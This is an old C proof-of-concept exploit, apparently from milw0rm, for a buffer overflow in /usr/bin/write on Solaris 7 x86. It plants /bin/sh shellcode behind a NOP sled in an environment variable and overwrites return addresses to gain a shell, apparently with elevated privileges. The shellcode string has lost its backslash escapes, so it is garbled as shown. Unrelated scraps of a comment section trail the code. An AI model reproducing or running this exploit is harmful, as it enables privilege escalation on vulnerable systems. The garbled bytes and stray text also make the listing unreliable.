#include <stdio.h>
#include <unistd.h>
/*
/usr/bin/write overflow proof of conecpt.
Tested on Solaris 7 x86
Pablo Sor, Buenos Aires, Argentina. 01/2000
[email protected]
usage: write-exp [shell_offset] [ret_addr_offset]
default offset should work.
*/
long get_esp() { __asm__("movl %esp,%eax"); }
char shell[] =
"xebx45x9axffxffxffxffx07xff"
"xc3x5ex31xc0x89x46xb7x88x46"
"xbcx88x46x07x89x46x0cx31xc0"
"xb0x2fxe8xe0xffxffxffx52x52"
"x31xc0xb0xcbxe8xd5xffxffxff"
"x83xc4x08x31xc0x50x8dx5ex08"
"x53x8dx1ex89x5ex08x53xb0x3b"
"xe8xbexffxffxffx83xc4x0cxe8"
"xbexffxffxffx2fx62x69x6ex2f"
"x73x68xffxffxffxffxffxffxff"
"xffxff";
/* shellcode by Cheez Whiz */
void main(int argc,char **argv)
{
FILE *fp;
long magic,magicret;
char buf[100],*envi;
int i;
envi = (char *) malloc(1000*sizeof(char));
memset(envi,0x90,1000);
memcpy(envi,"SOR=",4);
memcpy(envi+980-strlen(shell),shell,strlen(shell));
envi[1000]=0;
putenv(envi);
if (argc!=3)
{
magicret = get_esp()+116;
magic = get_esp()-1668;
}
else
{
magicret = get_esp()+atoi(argv[1]);
magic = get_esp()+atoi(argv[2]);
}
memset(buf,0x41,100);
buf[99]=0;
memcpy(buf+91,&magic,4);
for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4);
execl("/usr/bin/write","write","root",buf,(char *)0);
}
// milw0rm.com [2001-01-25]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666